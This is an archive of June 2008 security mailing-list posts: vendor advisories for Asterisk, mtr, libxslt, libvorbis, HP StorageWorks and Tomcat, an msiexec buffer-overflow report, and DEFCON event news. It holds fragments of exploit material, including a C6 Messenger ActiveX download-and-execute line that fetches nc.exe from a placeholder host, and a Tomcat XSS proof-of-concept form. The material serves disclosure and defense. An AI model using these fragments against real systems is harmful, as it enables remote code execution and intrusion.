AST-2008-008: Remote Crash Vulnerability in SIP channel driver when run in pedantic mode
Asterisk Project Security Advisory - AST-2008-008 ++ | Product | Asterisk | |+---| | Summary | Remote Crash Vulnerability in SIP channel driver | || when run in pedantic mode | |+---| | Nature of Advisory | Denial of Service | |+---| | Susceptibility | Remote Unauthenticated Sessions | |+---| | Severity | Critical | |+---| | Exploits Known | No| |+---| |Reported On | May 8, 2008 | |+---| |Reported By | Hooi Ng (bugs.digium.com user hooi) | |+---| | Posted On | May 8, 2008 | |+---| | Last Updated On | June 3, 2008 | |+---| | Advisory Contact | Joshua Colp <[EMAIL PROTECTED]>| |+---| | CVE Name | CVE-2008-2119 | ++ ++ | Description | During pedantic SIP processing the From header value is | | | passed to the ast_uri_decode function to be decoded. In | | | two instances it is possible for the code to cause a | | | crash as the From header value is not checked to be | | | non-NULL before being passed to the function.| ++ ++ | Resolution | The From header value is now copied into a buffer before | || being passed to the ast_uri_decode function if pedantic | || is enabled and in another instance it is checked to be| || non-NULL before being passed. | ++ ++ | Affected Versions| || |Product| Release | | | | Series | | |---++---| | Asterisk Open Source | 1.0.x| All versions | |---++---| | Asterisk Open Source | 1.2.x| All versions prior to | | || 1.2.29| |---++---| | Asterisk Open Source | 1.4.x| Not Affected | |---++---| | Asterisk Business Edition | A.x.x| All versions | |---++---| | Asterisk Business Edition | B.x.x| All versions prior to | | || B.2.5.3 | |---++---| | Asterisk Business Edition | C.x.x| Not Affected | |---++---| | AsteriskNOW | 1.0.x| Not Affected | |---++---| | Asterisk Appliance Developer | 0.x.x| Not Affected | | Kit || | |---
AccessMe Tool Release
Hello, Security Compass is proud to announce the release of AccessMe, the latest addition to our ExploitMe series of free penetration testing add-ons for Mozilla Firefox. This preliminary release of AccessMe expands the series with powerful functionality for testing the access control and session management mechanisms of web applications, including: - Invalid HTTP method attacks - Bypassing access control using HTTP HEAD - Session dropping We're releasing this tool as open-source under the GPLv3, and hope they will assist penetration testers, QA staff, and developers detect and eliminate common security vulnerabilities in today's web applications. Please visit http://www.securitycompass.com/ to download AccessMe, and all of our other free penetration testing tools. Regards, Oliver Lavery Security Compass
[NSG 03-06-2008] C6 Messenger Installation Url DownloaderActiveX Control Remote Download & Execute Exploit
http://yoursite.com/nc.exe";>
London DEFCON June meet - DC4420 - Thursday 5th June
hey all, it's that time of the month again! so we present to you : DC4420 June @ the Glassblower: - Wargames! The Winning team will be presenting 'how they did it' - (note:everyone should buy them Guinness. Schwag will be awarded as well) - Last-minute hastily-put-together presentation on locks. autom8ton - bring your locks/picks and we'll have a workshop afterwards. - New speaker! Alex talking about Social engineering - 5 minute slot - a demo by Richard. (demo is such a lovely term for a talk, could be anything!) - MM will be calling for participation in an "art" project. If you have camera equipment, film making skills, editing skills, music/dubbing skills, please step forward! This is going to be fun, and to do with RFID. It's entitled "PARFID: Passive Aggressive RFID. RFIDIOts fight back!". Also, please get in touch with me or alien if you would like to talk at the July meeting, June is now full :-) There will be workshops after the talks - please bring locks + picks if you have them (and are legally entitled to carry them!) :P Where? Upstairs @ Glassblower http://maps.google.com/maps?f=q&hl=en&geocode=&q=W1B+5DL&ie=UTF8&ll=51.510625,-0.136878&spn=0.00629,0.021415&z=16&iwloc=addr 42 Glasshouse St, Piccadilly, W 1B 5JY doors open from 7, speaking starts from 7.30 - please try and be prompt as some people need to go early to get trains back out of London. we have private use of the whole of the upstairs till close. real ale on draught : Adnams Broadside + Spitfire, 'Buccomb' and 'Doombar'. other stuff on draught : Guinness, Staropramen, Hoegaarden, Leffe. even more stuff on draught : Becks, Fosters, 1664 food menu is extensive and most importantly : they do Pie. as always, details & discussions here: http://dc4420.org cheers, MM -- "In DEFCON, we have no names..." errr... well, we do... but silly ones...
[ GLSA 200806-01 ] mtr: Stack-based buffer overflow
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200806-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: mtr: Stack-based buffer overflow Date: June 03, 2008 Bugs: #223017 ID: 200806-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis A stack-based buffer overflow was found in mtr, possibly resulting in the execution of arbitrary code. Background == mtr combines the functionality of the 'traceroute' and 'ping' programs in a single network diagnostic tool. Affected packages = --- Package / Vulnerable / Unaffected --- 1 net-analyzer/mtr < 0.73-r1>= 0.73-r1 Description === Adam Zabrocki reported a boundary error within the split_redraw() function in the file split.c, possibly leading to a stack-based buffer overflow. Impact == A remote attacker could use a specially crafted resolved hostname to execute arbitrary code with root privileges. However, it is required that the attacker controls the DNS server used by the victim, and that the "-p" (or "--split") command line option is used. Workaround == There is no known workaround at this time. Resolution == All mtr users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-analyzer/mtr-0.73-r1" References == [ 1 ] CVE-2008-2357 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2357 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200806-01.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: OpenPGP digital signature
RE: Windows Installer msiexec GUID Buffer Overflow
So, the "possible code execution" would run code in the context of the user who was running msiexec.exe? If you are going to get them to run code to exploit the "vulnerability," wouldn't it be more efficient to just get them to run whatever resultant code you were trying to run in the first place? t > -Original Message- > From: Patrick Webster [mailto:[EMAIL PROTECTED] > Sent: Tuesday, June 03, 2008 3:13 AM > To: bugtraq@securityfocus.com > Subject: Windows Installer msiexec GUID Buffer Overflow > > aushack.com - Vulnerability Advisory > --- > Release Date: > 03-Jun-2008 > > Software: > Microsoft Corporation - Windows Installer (msiexec.exe) > http://www.microsoft.com/ > > "Microsoft Windows Installer is an installation and configuration > service that > reduces the total cost of ownership. Windows Installer enables > customers to > provide better corporate deployment and provides a standard format > for > component management." > > Versions tested: > 4.5.6001.22159 and 3.1.4000.1823 are vulnerable. > Other versions are untested but assumed. > > Vulnerability discovered: > > Unicode based stack overflow. > > Vulnerability impact: > > Moderate - Code execution is possible but difficult due to the unicode > conversion. Some ActiveX controls pass the GUID, so it may > be exploited remotely. Other avenues may also be present. > > Vulnerability information: > > By specifying an overly long Globally Uniquie Identifier (GUID), > it is possible to overwrite the stack and SE Handler. > > Example: > > msiexec.exe /x {} > > References: > aushack.com advisory > http://www.aushack.com/200806-msiexec.txt > > Credit: > Patrick Webster ( [EMAIL PROTECTED] ) > > Disclosure timeline: > 03-Jun-2008 - Disclosure. > > EOF
[ GLSA 200806-02 ] libxslt: Execution of arbitrary code
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200806-02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: libxslt: Execution of arbitrary code Date: June 03, 2008 Bugs: #222499 ID: 200806-02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis A vulnerability was found in libxslt, possibly resulting in the execution of arbitrary code and Denial of Service. Background == Libxslt is the XSLT C library developed for the GNOME project. XSLT itself is an XML language to define transformations for XML. Affected packages = --- Package / Vulnerable / Unaffected --- 1 dev-libs/libxslt < 1.1.24 >= 1.1.24 Description === Anthony de Almeida Lopes reported a vulnerability in libxslt when handling XSL style-sheet files, which could be exploited to trigger the use of uninitialized memory, e.g. in a call to "free()". Impact == A remote attacker could entice a user or automated system to process an XML file using a specially crafted XSL transformation file, possibly resulting in the execution of arbitrary code or a Denial of Service. Workaround == There is no known workaround at this time. Resolution == All libxslt users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/libxslt-1.1.24" References == [ 1 ] CVE-2008-1767 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1767 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200806-02.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: OpenPGP digital signature
Re: Windows Installer msiexec GUID Buffer Overflow
Other flags may be vulnerable as well. Microsoft has a thing for unicode.
[security bulletin] HPSBST02312 SSRT071428 rev.1 - HP StorageWorks Storage Mirroring Software, Remote Execution of Arbitrary Code
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c01362558 Version: 1 HPSBST02312 SSRT071428 rev.1 - HP StorageWorks Storage Mirroring Software, Remote Execution of Arbitrary Code NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2008-06-02 Last Updated: 2008-06-02 Potential Security Impact: Remote execution of arbitrary code. Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified in HP StorageWorks Storage Mirroring (SWSM) software. This vulnerability could allow remote execution of arbitrary code. References: CVE-2008-1661. SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP StorageWorks Storage Mirroring software v4.5 Service Pack 1. BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2008-1661 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002. CVSS 2.0 Base Metrics The Hewlett-Packard Company thanks Titon of BastardLabs working with TippingPoint's Zero Day Initiative for reporting this vulnerability to [EMAIL PROTECTED] RESOLUTION To resolve this vulnerability download HP StorageWorks Storage Mirroring software v4.5 Service Pack 2 (SP2) from Double-Take at the following URL: http://www.doubletake.com/products/double-take/default.aspx Note: Double-Take v5.0 (HP StorageWorks Storage Mirroring software v5.0) is now available for download from the above URL; this version includes the resolution to the stated vulnerability as well as a broad range of new features and improvements. PRODUCT SPECIFIC INFORMATION None HISTORY Version:1 (rev.1) - 2 June 2008 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For further information, contact normal HP Services support channel. Report: To report a potential security vulnerability with any HP supported product, send Email to: [EMAIL PROTECTED] It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows: To: [EMAIL PROTECTED] Subject: get key Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your ITRC security bulletins and patches - check ALL categories for which alerts are required and continue. Under Step2: your ITRC operating systems - verify your operating system selections are checked and save. To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections. To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do * The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title: GN = HP General SW MA = HP Management Agents MI = Misc. 3rd Party SW MP = HP MPE/iX NS = HP NonStop Servers OV = HP OpenVMS PI = HP Printing & Imaging ST = HP Storage SW TL = HP Trusted Linux TU = HP Tru64 UNIX UX = HP-UX VV = HP VirtualVault System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions. "HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement." ©Copyright 2008 Hewlett-Packard Development Company, L.P.
[SECURITY] [DSA 1591-1] New libvorbis packages fix several vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1591-1 [EMAIL PROTECTED] http://www.debian.org/security/ Thijs Kinkhorst June 03, 2008 http://www.debian.org/security/faq - Package: libvorbis Vulnerability : several Problem type : local (remote) Debian-specific: no CVE Id(s) : CVE-2008-1419 CVE-2008-1420 CVE-2008-1423 Debian Bug : 482518 Several local (remote) vulnerabilities have been discovered in libvorbis, a library for the Vorbis general-purpose compressed audio codec. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2008-1419 libvorbis does not properly handle a zero value which allows remote attackers to cause a denial of service (crash or infinite loop) or trigger an integer overflow. CVE-2008-1420 Integer overflow in libvorbis allows remote attackers to execute arbitrary code via a crafted OGG file, which triggers a heap overflow. CVE-2008-1423 Integer overflow in libvorbis allows remote attackers to cause a denial of service (crash) or execute arbitrary code via a crafted OGG file which triggers a heap overflow. For the stable distribution (etch), these problems have been fixed in version 1.1.2.dfsg-1.4. For the unstable distribution (sid), these problems have been fixed in version 1.2.0.dfsg-3.1. We recommend that you upgrade your libvorbis package. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - --- Source archives: http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbis_1.1.2.dfsg-1.4.dsc Size/MD5 checksum: 787 2f0bfd28fb368c43c56332e7de7a2e3d http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbis_1.1.2.dfsg.orig.tar.gz Size/MD5 checksum: 1312540 44cf09fef7f78e7c6ba7dd63b6137412 http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbis_1.1.2.dfsg-1.4.diff.gz Size/MD5 checksum:15782 62527e6adcff1dca42018a0252b19b91 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbisenc2_1.1.2.dfsg-1.4_alpha.deb Size/MD5 checksum:94500 edb2728b48cd6fc0357f62a7dc8fca5c http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbis0a_1.1.2.dfsg-1.4_alpha.deb Size/MD5 checksum: 110468 8273babee8a08c373671b468469b2ede http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbisfile3_1.1.2.dfsg-1.4_alpha.deb Size/MD5 checksum:19202 925dfba3f212e8b69c760c433b119716 http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbis-dev_1.1.2.dfsg-1.4_alpha.deb Size/MD5 checksum: 494958 0052fe78f4be43cb9a7f42ea2b25f7fe amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbisfile3_1.1.2.dfsg-1.4_amd64.deb Size/MD5 checksum:17790 f49da89a8b972614687f3a5e2f6c5bac http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbisenc2_1.1.2.dfsg-1.4_amd64.deb Size/MD5 checksum:93498 241499415b96f3e348d1ec9c66a45981 http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbis0a_1.1.2.dfsg-1.4_amd64.deb Size/MD5 checksum: 101508 63e1e8392876a822dc664e21b19e0185 http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbis-dev_1.1.2.dfsg-1.4_amd64.deb Size/MD5 checksum: 468670 8c6c80eb7b8e7f8b49be1447357ebce1 arm architecture (ARM) http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbisenc2_1.1.2.dfsg-1.4_arm.deb Size/MD5 checksum:75744 03dad28341cde24fbbfd20444bf346c2 http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbisfile3_1.1.2.dfsg-1.4_arm.deb Size/MD5 checksum:18528 508cb939f65a367447c44add9dd8c11a http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbis0a_1.1.2.dfsg-1.4_arm.deb Size/MD5 checksum:98190 a09c2d3021f7b9d2d9b2bf04b2d30957 http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbis-dev_1.1.2.dfsg-1.4_arm.deb Size/MD5 checksum: 458578 6dcadbb28c56a0a9368bfcd67b28d3fa hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/libv/libvorbis/libvorbis-dev_1.1.2.dfsg-1.4_hppa.deb Size/MD5 checksum: 483196 0435784553fb2b9c08c915da58c3c7e1 http://security.debian.org/pool/updates/main/libv/libv
Windows Installer msiexec GUID Buffer Overflow
aushack.com - Vulnerability Advisory --- Release Date: 03-Jun-2008 Software: Microsoft Corporation - Windows Installer (msiexec.exe) http://www.microsoft.com/ "Microsoft Windows Installer is an installation and configuration service that reduces the total cost of ownership. Windows Installer enables customers to provide better corporate deployment and provides a standard format for component management." Versions tested: 4.5.6001.22159 and 3.1.4000.1823 are vulnerable. Other versions are untested but assumed. Vulnerability discovered: Unicode based stack overflow. Vulnerability impact: Moderate - Code execution is possible but difficult due to the unicode conversion. Some ActiveX controls pass the GUID, so it may be exploited remotely. Other avenues may also be present. Vulnerability information: By specifying an overly long Globally Uniquie Identifier (GUID), it is possible to overwrite the stack and SE Handler. Example: msiexec.exe /x {} References: aushack.com advisory http://www.aushack.com/200806-msiexec.txt Credit: Patrick Webster ( [EMAIL PROTECTED] ) Disclosure timeline: 03-Jun-2008 - Disclosure. EOF
[SECURITY] CVE-2008-1947: Tomcat host-manager XSS vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 CVE-2008-1947: Tomcat host-manager XSS vulnerability Severity: Low Vendor: The Apache Software Foundation Versions Affected: Tomcat 5.5.9 to 5.5.26 Tomcat 6.0.0 to 6.0.16 This issue has been fixed in the source repositories for each version and will be included in 5.5.27 and 6.0.17. It is anticipated that these versions will be released shortly. Description: The user supplied hostname attribute is not filtered before being included in the output. Mitigation: Do not visit untrusted sites whilst logged in to the host-manager application and log out (close the browser) once finished with the host-manager. Example: Assume that after logged in, the victim was lead to the malicious web server with following file installed. http://localhost:8080/host-manager/html/add"; method="get"> ~ ~ ~ Credit: These issues were discovered by Petr Splichal of RedHat. References: http://tomcat.apache.org/security.html Mark Thomas -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iEYEARECAAYFAkhEahEACgkQb7IeiTPGAkOQggCgirNfHSCkMDhcEzG6Ig1N0WzP qesAoKXePHeBKaB0VzeBoowW5kvZpBQx =4nQe -END PGP SIGNATURE-
Advisory: Xerox Workaround & planned patch
Note: Xerox has released a minimal-impact workaround for this issue for DocuShare 4.x, 5.x, and 6.x. The workaround is detailed at https://docushare.xerox.com/doug/dsweb/View/Collection-7503 We will also be releasing a patch to restore full functionality. Please refer to the above collection, or use your DocuShare support contact, for further information. Thank you to Doz and HackersCenter for finding and reporting this issue. Leigh L. Klotz, Jr. Xerox Corporation (Submitted by S.Hawley, Xerox)
DEFCON 16 Updates - Get involved!
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 DEFCON 16 Updates! As DEFCON 16 gets closer its awesome powers, much like a kraken summoned by Dethklok, continues to grow. How do you become friends with a kraken? You get to know it. Have a beer. Below are various way you can get involved with DEFCON 16 contests and events. The Call for Papers is closed, and selections are being announced all this week, so it is a bit too late to speak, but not too late to get involved. https://www.defcon.org/html/defcon-16/dc-16-speakers.html Artwork Contest: Artwork Contest is now underway! The first batch of submissions is up at: https://pics.defcon.org/showgallery.php?cat=532 Entries will be posted as they are received, and will be accepted through June 15th. There will then be a vote on pics.defcon.org for the viewers choice award. You must to have a forums/pics account to vote, so go sign up! The Official rules, prizes, and entry information can be found at: http://www.defcon.org/html/defcon-16/dc-16-artwork-contest.html Black and White Ball: A Call for Talent, DJs, and Bands has been issued by the organizers of the B&W Ball, which you may find at: https://forum.defcon.org/showthread.php?t=9266 There is also currently discussion on the DEFCON Forums about a new theme for the B&W Ball, which you can find on this thread: https://forum.defcon.org/showthread.php?t=9142 Capture the Flag Quals for this year's CTF qualifications are complete.. check out the results here: https://forum.defcon.org/forumdisplay.php?f=356 http://www.kenshoto.com/ LosT @ Con Mystery Challenge: LosT is working his devious magic again with the LosT @ Con Mystery Challenge! There is a Pre-Reg Challenge currently open, and you can find instructions at: https://forum.defcon.org/showthread.php?t=9357. http://www.mysterychallenge.org New for DEFCON 16 Buzzword Survivor: New Contest for DEFCON 16. Check out discussion of this contest as it develops at https://forum.defcon.org/forumdisplay.php?f=352 Hardware Hacking Village: To state it most simply, it's a way to give all the Defcon attendees that like electronics a place to play. It's also intended to be a place for everyone that thinks "Wow! That looks cool! I wish I knew how to do that!". It's also going to be the headquarters for Joe Grand (kingpin) so he can talk about hacking past badges and such. It should be a great place to hang out. Find more info on the forums at https://forum.defcon.org/showthread.php?t=9295. The Race to Zero: This one is generating a whole lot of buzz in the press. The Race to Zero involves contestants being given a sample set of viruses and malcode to modify and upload through the contest portal. The portal passes the modified samples through a number of antivirus engines and determines if the sample is a known threat. The first team or individual to pass their sample past all antivirus engines undetected wins that round. Each round increases in complexity as the contest progresses. Further details are available here: http://www.racetozero.net/ And let's not forget the Gringo Challenge, DEF CON B0TS, Lockpick village, a new Hardware Hacking Village, and more. Check it all out at: DEFCON Website: https://www.defcon.org/ Forums and Blogs https://forum.defcon.org/ Follow the RSS feed: https://www.defcon.org/defconrss.xml Follow the announcements before, during, and after with twitter: http://www.twitter.com/defcon16 -BEGIN PGP SIGNATURE- Version: PGP Desktop 9.7.0 (Build 1012) Charset: us-ascii wsBVAwUBSESGHw6+AoIwjTCUAQjPXQf/Yqbb2kbmJMuwnh1sJXt0S/jFDAA5f2H2 MxzguQRKWlljBwmivMXACjYzibryK0Nb6GnpsS7OAtJWZupxSeVZ5DfXkJldaLPQ CS6EqmfB8nStg74/PIlB3jhiCUOYcrDdd9+9K2HdN1dD44bNU4ZL6BS2aChpTm4y RowRHBpv0BQFyi1UWpDXbGmQ99Ccinis/YDQNjGgKadcbTTD8ZQkgT++L82jrpef 9eOyYkRg8gOkuMgngx2ZASi/iRaodRA+2MZl4/SVDbm+tCjaQbRYjdaQh0NrJEM/ JssYWbYVOzuixtOV5nfn+k8nZ+08rTRv/TrAO2XegQKhJrQoaQjT+g== =n5kj -END PGP SIGNATURE-